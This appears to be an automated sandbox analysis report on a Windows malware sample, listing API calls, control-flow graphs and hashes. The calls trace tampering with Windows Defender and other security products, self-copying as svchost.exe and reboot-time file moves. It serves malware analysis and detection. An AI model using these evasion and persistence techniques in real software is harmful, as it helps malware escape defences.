                                                                                                                                                                                                                • Associated: 00000000.00000002.1397114417.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_arxtPs1STE.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: LibraryPath$AddressAppendCurrentDirectoryFolderFreeLoadProcmemset
                                                                                                                                                                                                                • String ID: MpClient.dll$WDEnable$Windows Defender$v-@
                                                                                                                                                                                                                • API String ID: 1010965793-1794910726
                                                                                                                                                                                                                • Opcode ID: 9a8801f81893ad2c186c2148835d49196fca5eda48d8657e7ad32c24086763b8
                                                                                                                                                                                                                • Instruction ID: 6149f717096a9febd0c21d278ea6f34184d08bed9f30ffe58492fd99f82aed82
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9a8801f81893ad2c186c2148835d49196fca5eda48d8657e7ad32c24086763b8
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5A11D5B2940318BFD7219FA4DD49FAEB76CEB48710F00037AF705B22C0D27C4A418AA8

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                control_flow_graph 283 401b20-401b35 284 401bd7-401bdd 283->284 285 401b3b-401b48 call 401150 283->285 285->284 288 401b4e-401b59 RtlImageNtHeader 285->288 289 401bb5-401bc9 GetProcessHeap HeapValidate 288->289 290 401b5b-401b7c GetTickCount GetModuleHandleA 288->290 289->284 293 401bcb-401bd1 GetProcessHeap HeapFree 289->293 291 401b95-401bb0 call 401000 290->291 292 401b7e-401b8c GetProcAddress 290->292 291->289 292->291 294 401b8e 292->294 293->284 294->291
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00401150: CreateFileA.KERNELBASE(G,@,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,00000000,?,?,?,00401B44,00000000,00000000), ref: 00401177
                                                                                                                                                                                                                  • Part of subcall function 00401150: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 00401193
                                                                                                                                                                                                                  • Part of subcall function 00401150: GetProcessHeap.KERNEL32(00000008,?,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 004011B3
                                                                                                                                                                                                                  • Part of subcall function 00401150: RtlAllocateHeap.NTDLL(00000000,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 004011BA
                                                                                                                                                                                                                  • Part of subcall function 00401150: memset.MSVCRT ref: 004011CD
                                                                                                                                                                                                                  • Part of subcall function 00401150: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000001,?,?,?,00401B44), ref: 004011EA
                                                                                                                                                                                                                  • Part of subcall function 00401150: LockFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,00401B44), ref: 004011FA
                                                                                                                                                                                                                  • Part of subcall function 00401150: ReadFile.KERNELBASE(00000000,00000000,?,00000000,00000000,?,?,?,00401B44), ref: 00401209
                                                                                                                                                                                                                  • Part of subcall function 00401150: UnlockFile.KERNEL32(00000000,00401B44,00000000,?,00000000,?,?,?,00401B44), ref: 0040121C
                                                                                                                                                                                                                  • Part of subcall function 00401150: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401231
                                                                                                                                                                                                                  • Part of subcall function 00401150: HeapValidate.KERNEL32(00000000), ref: 00401234
                                                                                                                                                                                                                  • Part of subcall function 00401150: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401241
                                                                                                                                                                                                                  • Part of subcall function 00401150: HeapFree.KERNEL32(00000000), ref: 00401244
                                                                                                                                                                                                                • RtlImageNtHeader.NTDLL(00000000), ref: 00401B4F
                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00401B63
                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 00401B74
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 00401B84
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401BBE
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 00401BC1
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401BCE
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00401BD1
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1397114417.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_arxtPs1STE.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$File$Process$FreeValidate$AddressAllocateCountCreateHandleHeaderImageLockModulePointerProcReadSizeTickUnlockmemset
                                                                                                                                                                                                                • String ID: G,@$RtlUniform$ntdll.dll
                                                                                                                                                                                                                • API String ID: 3168189189-905597979
                                                                                                                                                                                                                • Opcode ID: 2010ef54e731929bdeef478eef36219a5a0ac2089432c3df2103351bfe7421e8
                                                                                                                                                                                                                • Instruction ID: 64d0ad1f4564684b16137518c26293c6cc216b866d3c13d6df455aa1ddd35d97
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2010ef54e731929bdeef478eef36219a5a0ac2089432c3df2103351bfe7421e8
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 00118271600304ABD724ABB69D49F9B7BA89F85755F044136FB09F62E1EB38DD00CA68

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                control_flow_graph 296 402680-4026ac CoInitializeEx 297 4026ae-4026b1 296->297 298 4026bf-4026e7 GetModuleFileNameW SysAllocString 296->298 297->298 299 4026b3-4026b9 297->299 300 402869-40286f 298->300 301 4026ed-4026f8 SysAllocString 298->301 299->298 302 4028c4-4028c9 299->302 303 402871-402876 300->303 304 402879-40287e 300->304 305 402853-402861 SysFreeString 301->305 306 4026fe-40271f CoCreateInstance 301->306 303->304 309 402880-402885 304->309 310 402888-40288d 304->310 307 402863-402864 SysFreeString 305->307 308 402866 305->308 311 402725-40272a 306->311 312 402827-40282a 306->312 307->308 308->300 309->310 314 402897-40289c 310->314 315 40288f-402894 310->315 311->312 313 402730-402741 311->313 312->305 313->305 323 402747-402758 313->323 316 4028a6-4028ab 314->316 317 40289e-4028a3 314->317 315->314 318 4028b5-4028b7 316->318 319 4028ad-4028b2 316->319 317->316 321 4028b9-4028bc 318->321 322 4028be CoUninitialize 318->322 319->318 321->302 321->322 322->302 323->305 325 40275e-402768 323->325 326 40276d-40276f 325->326 326->305 327 402775-40277c 326->327 328 402851 327->328 329 402782-402793 327->329 328->305 329->328 331 402799-4027b1 329->331 333 4027b3-4027d3 CoCreateInstance 331->333 334 40282c-40283d 331->334 335 4027d5-4027da 333->335 336 4027dc 333->336 334->328 340 40283f-402843 334->340 335->336 337 4027de-4027e3 335->337 336->337 337->328 339 4027e5-4027f0 337->339 339->328 343 4027f2-402803 339->343 340->328 341 402845-40284e 340->341 341->328 343->328 345 402805-402814 343->345 345->328 347 402816-402825 345->347 347->328
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040269F
                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000), ref: 004026CD
                                                                                                                                                                                                                • SysAllocString.OLEAUT32(?), ref: 004026E0
                                                                                                                                                                                                                • SysAllocString.OLEAUT32(Windows Explorer), ref: 004026F2
                                                                                                                                                                                                                • CoCreateInstance.OLE32(00404E70,00000000,00004401,00404E80,?), ref: 0040271B
                                                                                                                                                                                                                • CoCreateInstance.OLE32(00404E90,00000000,00004401,00404EA0,?), ref: 004027CF
                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00402DB5), ref: 0040285D
                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 00402864
                                                                                                                                                                                                                • CoUninitialize.COMBASE ref: 004028BE
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1397114417.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_arxtPs1STE.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: String$AllocCreateFreeInstance$FileInitializeModuleNameUninitialize
                                                                                                                                                                                                                • String ID: Windows Explorer
                                                                                                                                                                                                                • API String ID: 1140695583-228612681
                                                                                                                                                                                                                • Opcode ID: 4af7e25e07fe91e1fd00f1fb65f3c817a061b1e1e25a39bc6d6eebae34654fce
                                                                                                                                                                                                                • Instruction ID: b52a01207190e4a30f96b10a649eeabca6697c1dd3b0d782d0755018a236c0da
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4af7e25e07fe91e1fd00f1fb65f3c817a061b1e1e25a39bc6d6eebae34654fce
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2E714175A006169FCB10EB99CD88DAFB7B9AF88300B24816AE504F73D0D7B5ED42CB54
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetCurrentThread.KERNEL32 ref: 00401E10
                                                                                                                                                                                                                • OpenThreadToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E17
                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000020,0040104F,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E27
                                                                                                                                                                                                                • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E2E
                                                                                                                                                                                                                • LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 00401E51
                                                                                                                                                                                                                • AdjustTokenPrivileges.KERNELBASE(0040104F,00000000,00000001,00000000,00000000,00000000), ref: 00401E6B
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00401E75
                                                                                                                                                                                                                • CloseHandle.KERNELBASE(0040104F), ref: 00401E86
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1397114417.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_arxtPs1STE.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Token$CurrentOpenProcessThread$AdjustCloseErrorHandleLastLookupPrivilegePrivilegesValue
                                                                                                                                                                                                                • String ID: SeSecurityPrivilege
                                                                                                                                                                                                                • API String ID: 731831024-2333288578
                                                                                                                                                                                                                • Opcode ID: 0b5c4ba04f49aa1d8c4809081d8a63f9d909b8f533a1819c24dc1b0a7e06f584
                                                                                                                                                                                                                • Instruction ID: 2f4dd94adce221d10feffccf969df1866f37505423b255349c6b180ac4db3a06
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0b5c4ba04f49aa1d8c4809081d8a63f9d909b8f533a1819c24dc1b0a7e06f584
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 92113CB6A00205ABE710DBE0DE0DFAF7B7CAB84B41F104129BB05F61D0D7749A04C7A9
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CreateFileA.KERNELBASE(\\.\pipe\acsipc_server,C0000000,00000003,?,00000003,80000080,00000000,00000000), ref: 004023F6
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,D48A445E,00000028,?,00000000), ref: 00402416
                                                                                                                                                                                                                • GetSystemTimeAsFileTime.KERNEL32(?), ref: 0040241C
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,B5CB6C63,0000001C,?,00000000), ref: 0040243A
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040243D
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1397114417.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_arxtPs1STE.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: File$TimeWrite$CloseCreateHandleSystem
                                                                                                                                                                                                                • String ID: \\.\pipe\acsipc_server
                                                                                                                                                                                                                • API String ID: 3225117150-898603304
                                                                                                                                                                                                                • Opcode ID: 09079f795ad6bdb91afb2c9b6928e581e643feef602d34b17a80bf8da01f816f
                                                                                                                                                                                                                • Instruction ID: f0829fbf90d271a43df41d43683be69a37a07176176bc6acbc5691eaf7b0b3d2
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 09079f795ad6bdb91afb2c9b6928e581e643feef602d34b17a80bf8da01f816f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: CA31F2B1C0121CAFDB10DFD9D985AEEFBB8FB48314F10422AE614BB280D7B41A458F95

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • VirtualQuery.KERNEL32(00401CB0,?,0000001C,00000000,00000000,7702DB30), ref: 00402AAB
                                                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 00402AC3
                                                                                                                                                                                                                • PathFileExistsA.KERNELBASE(?), ref: 00402AE4
                                                                                                                                                                                                                • GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 00402AFC
                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00402B3D
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00402B4D
                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(?), ref: 00402B5E
                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00402B96
                                                                                                                                                                                                                  • Part of subcall function 00401390: GetTickCount.KERNEL32 ref: 0040139B
                                                                                                                                                                                                                  • Part of subcall function 00401390: GetModuleHandleA.KERNEL32(ntdll.dll,?,00402BA2,00000000), ref: 004013AC
                                                                                                                                                                                                                  • Part of subcall function 00401390: GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 004013BC
                                                                                                                                                                                                                  • Part of subcall function 00401420: GetTickCount.KERNEL32 ref: 0040144A
                                                                                                                                                                                                                  • Part of subcall function 00401420: GetModuleHandleA.KERNEL32(ntdll.dll,?,00402BAE,-00000006,00000000), ref: 00401457
                                                                                                                                                                                                                  • Part of subcall function 00401420: GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 00401463
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 00402C10
                                                                                                                                                                                                                • CopyFileA.KERNEL32(?,?,00000001), ref: 00402C28
                                                                                                                                                                                                                • RtlImageNtHeader.NTDLL(00000000), ref: 00402C5A
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402C85
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 00402C88
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402C94
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00402C97
                                                                                                                                                                                                                • MoveFileExA.KERNEL32(?,?,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 00402CB6
                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00402CC5
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00402CD5
                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(?), ref: 00402CE6
                                                                                                                                                                                                                • GlobalFindAtomA.KERNEL32(Wed Jul 6 06:49:26 20111), ref: 00402D04
                                                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 00402D15
                                                                                                                                                                                                                • GlobalAddAtomA.KERNEL32(Wed Jul 6 06:49:26 20111), ref: 00402D20
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1397114417.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_arxtPs1STE.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ModuleProcess$AddressFileHandleHeapProc$CountTick$AtomCurrentGlobal$CopyDirectoryExistsExitFindFreeHeaderImageMoveNamePathQuerySystemValidateVirtualWindows_snprintf
                                                                                                                                                                                                                • String ID: %s_$.dat$IsWow64Process$Wed Jul 6 06:49:26 20111$\apppatch\$kernel32.dll$svchost.exe
                                                                                                                                                                                                                • API String ID: 4049655197-3112416296
                                                                                                                                                                                                                • Opcode ID: 66aefa0bda43174da8d304fb35afc24c9e162c35573b710bb5f0be43539d63f7
                                                                                                                                                                                                                • Instruction ID: 5ff553944d99263ee06e3162097b0b7c6440a9b95b570a66abc1ee1896f9e821
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 66aefa0bda43174da8d304fb35afc24c9e162c35573b710bb5f0be43539d63f7
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 28716FB15043419BC710EF609E9C96BBBE8BBD8300F44493EF786B72A1DB749944CB99

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CreateFileA.KERNELBASE(00000000,C0000000,00000003,00000000,00000002,00000080,00000000,00000000,00000000,?,?,?,?,00401BB5,00000000), ref: 00401039
                                                                                                                                                                                                                  • Part of subcall function 00401E00: GetCurrentThread.KERNEL32 ref: 00401E10
                                                                                                                                                                                                                  • Part of subcall function 00401E00: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E17
                                                                                                                                                                                                                  • Part of subcall function 00401E00: GetCurrentProcess.KERNEL32(00000020,0040104F,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E27
                                                                                                                                                                                                                  • Part of subcall function 00401E00: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E2E
                                                                                                                                                                                                                  • Part of subcall function 00401E00: LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 00401E51
                                                                                                                                                                                                                  • Part of subcall function 00401E00: AdjustTokenPrivileges.KERNELBASE(0040104F,00000000,00000001,00000000,00000000,00000000), ref: 00401E6B
                                                                                                                                                                                                                  • Part of subcall function 00401E00: GetLastError.KERNEL32 ref: 00401E75
                                                                                                                                                                                                                  • Part of subcall function 00401E00: CloseHandle.KERNELBASE(0040104F), ref: 00401E86
                                                                                                                                                                                                                • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 00401060
                                                                                                                                                                                                                • GetSecurityDescriptorSacl.ADVAPI32(?,?,00401BB5,?), ref: 00401081
                                                                                                                                                                                                                • SetNamedSecurityInfoA.ADVAPI32(00000000,00000001,00000010,00000000,00000000,00000000,00000000), ref: 0040109A
                                                                                                                                                                                                                • LocalFree.KERNEL32(?), ref: 004010A4
                                                                                                                                                                                                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000001), ref: 004010B8
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004010C7
                                                                                                                                                                                                                • WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000), ref: 004010D9
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004010E9
                                                                                                                                                                                                                • SetEndOfFile.KERNELBASE(00000000), ref: 004010F6
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401118
                                                                                                                                                                                                                • CloseHandle.KERNELBASE(00000000), ref: 00401129
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1397114417.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_arxtPs1STE.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: File$Security$DescriptorHandleToken$CloseCurrentOpenProcessThread$AdjustConvertCreateErrorFreeInfoInformationLastLocalLockLookupNamedPointerPrivilegePrivilegesSaclStringUnlockValueWrite
                                                                                                                                                                                                                • String ID: S:(ML;;NRNWNX;;;LW)
                                                                                                                                                                                                                • API String ID: 1027056982-820036962
                                                                                                                                                                                                                • Opcode ID: 81d4fb4f5fac3a8a28ffc8fda7917889cd3cc1cb556f91fb1df1ae6cc93ce86d
                                                                                                                                                                                                                • Instruction ID: e082a392c3e1c8ea6bcbabec48e58df7c8b9917df2aee0f20a935e5e0ee169a7
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 81d4fb4f5fac3a8a28ffc8fda7917889cd3cc1cb556f91fb1df1ae6cc93ce86d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C4518E715093806FE7128B609D18BAA3FB99F47701F1941EBE680FA1E3D27C4D49C769

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SHGetFolderPathA.SHELL32(00000000,00000023,00000000,00000000,?), ref: 0040255C
                                                                                                                                                                                                                • CreateFileA.KERNELBASE(?,C0000000,00000003,00000000,00000003,00000080,00000000,00000000), ref: 004025C0
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,000017A8,00000000,00000000), ref: 004025E3
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 004025F8
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000B98,00000000,00000000), ref: 00402604
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 00402613
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,000017E4,00000000,00000000), ref: 0040261F
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 0040262E
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,000017DC,00000000,00000000), ref: 0040263A
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 00402649
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00003380,00000000,00000000), ref: 00402655
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 00402664
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00402667
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1397114417.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_arxtPs1STE.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: File$PointerWrite$CloseCreateFolderHandlePath
                                                                                                                                                                                                                • String ID: \PrevxCSI\csidb.csi
                                                                                                                                                                                                                • API String ID: 606440919-2829233815
                                                                                                                                                                                                                • Opcode ID: 79a3c48366173e2e4432591fd9d0211125a55660129729a41d6644ffa549504a
                                                                                                                                                                                                                • Instruction ID: 8b448ea0795f31fda95dadee176b54ca291314fb6d6361d02f59f031212173a5
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 79a3c48366173e2e4432591fd9d0211125a55660129729a41d6644ffa549504a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D93128716842187EF311EB90DC9AFEE7768EB89B00F104165F304AA1D0DBF16A45CBE9

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                control_flow_graph 209 4000f1-4001e3 call 4001ca 214 4001e5-400258 209->214 215 400259 209->215 216 40025a-401011 214->216 215->216 221 401017-40101a 216->221 222 40113c-401141 216->222 221->222 223 401020-401022 221->223 223->222 224 401028-401044 CreateFileA 223->224 225 401139 224->225 226 40104a-401051 call 401e00 224->226 225->222 229 401053-401068 ConvertStringSecurityDescriptorToSecurityDescriptorW 226->229 230 4010aa-4010f3 SetFilePointer LockFile WriteFile UnlockFile 226->230 229->230 233 40106a-401089 GetSecurityDescriptorSacl 229->233 231 401105 230->231 232 4010f5-401103 SetEndOfFile 230->232 236 401108-401111 231->236 232->231 232->236 234 4010a0-4010a4 LocalFree 233->234 235 40108b-40109a SetNamedSecurityInfoA 233->235 234->230 235->234 237 401113-401120 GetHandleInformation 236->237 238 40112f-401136 236->238 237->238 239 401122-401126 237->239 239->238 240 401128-401129 CloseHandle 239->240 240->238
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CreateFileA.KERNELBASE(00000000,C0000000,00000003,00000000,00000002,00000080,00000000,00000000,00000000,?,?,?,?,00401BB5,00000000), ref: 00401039
                                                                                                                                                                                                                  • Part of subcall function 00401E00: GetCurrentThread.KERNEL32 ref: 00401E10
                                                                                                                                                                                                                  • Part of subcall function 00401E00: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E17
                                                                                                                                                                                                                  • Part of subcall function 00401E00: GetCurrentProcess.KERNEL32(00000020,0040104F,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E27
                                                                                                                                                                                                                  • Part of subcall function 00401E00: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E2E
                                                                                                                                                                                                                  • Part of subcall function 00401E00: LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 00401E51
                                                                                                                                                                                                                  • Part of subcall function 00401E00: AdjustTokenPrivileges.KERNELBASE(0040104F,00000000,00000001,00000000,00000000,00000000), ref: 00401E6B
                                                                                                                                                                                                                  • Part of subcall function 00401E00: GetLastError.KERNEL32 ref: 00401E75
                                                                                                                                                                                                                  • Part of subcall function 00401E00: CloseHandle.KERNELBASE(0040104F), ref: 00401E86
                                                                                                                                                                                                                • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 00401060
                                                                                                                                                                                                                • GetSecurityDescriptorSacl.ADVAPI32(?,?,00401BB5,?), ref: 00401081
                                                                                                                                                                                                                • SetNamedSecurityInfoA.ADVAPI32(00000000,00000001,00000010,00000000,00000000,00000000,00000000), ref: 0040109A
                                                                                                                                                                                                                • LocalFree.KERNEL32(?), ref: 004010A4
                                                                                                                                                                                                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000001), ref: 004010B8
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004010C7
                                                                                                                                                                                                                • WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000), ref: 004010D9
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004010E9
                                                                                                                                                                                                                • SetEndOfFile.KERNELBASE(00000000), ref: 004010F6
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401118
                                                                                                                                                                                                                • CloseHandle.KERNELBASE(00000000), ref: 00401129
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1397114417.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_arxtPs1STE.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: File$Security$DescriptorHandleToken$CloseCurrentOpenProcessThread$AdjustConvertCreateErrorFreeInfoInformationLastLocalLockLookupNamedPointerPrivilegePrivilegesSaclStringUnlockValueWrite
                                                                                                                                                                                                                • String ID: S:(ML;;NRNWNX;;;LW)
                                                                                                                                                                                                                • API String ID: 1027056982-820036962
                                                                                                                                                                                                                • Opcode ID: ed4ffb2dba8d29d9f73b1762ba96064b0f1017704a5a4d581a31cc202295fe74
                                                                                                                                                                                                                • Instruction ID: f59e5f2c9003a6e204812eb1f8c7eb33969ee6ba3e941ca0e7e6302637e7b3a9
